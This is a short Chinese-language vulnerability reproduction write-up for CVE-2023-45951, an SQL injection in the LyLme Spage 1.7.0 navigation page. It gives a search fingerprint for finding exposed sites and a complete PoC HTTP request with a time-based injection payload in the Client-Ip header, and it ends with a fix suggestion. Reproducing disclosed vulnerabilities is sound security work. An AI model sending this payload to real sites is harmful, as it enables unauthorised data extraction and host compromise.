六零导航页SQL注入漏洞复现（CVE-2023-45951）

0x01 产品简介

   LyLme Spage（六零导航页）是中国六零（LyLme）开源的一个导航页面。致力于简洁高效无广告的上网导航和搜索入口，支持后台添加链接、自定义搜索引擎，沉淀最具价值链接，全站无商业推广，简约而不简单。

0x02 漏洞概述

   LyLme Spage v1.7.0版本存在安全漏洞，该漏洞源于通过function.php的$userip参数发现包含 SQL 注入漏洞，未经授权的攻击者可通过该漏洞获取敏感信息,进一步利用可造成主机失陷。

0x03 影响范围

LyLme Spage 1.7.0

0x04 复现环境

title=="上网导航 - LyLme Spage"

0x05 漏洞复现

PoC

POST /apply/index.php?submit=post HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Client-Ip: 0'>if(1,sleep(10),2)>'

url=http%3A%2F%2Fbaidu.com&name=test&group_id=1&icon=&authcode=

延时10秒 

PS：漏洞存在于 HTTP Header 的 Client-Ip 字段，请求体中url字段值每请求一次就需要更换一次，不然无法成功

0x06 修复建议 

 在get_real_ip 中检查验证IP合法性，防止SQL注入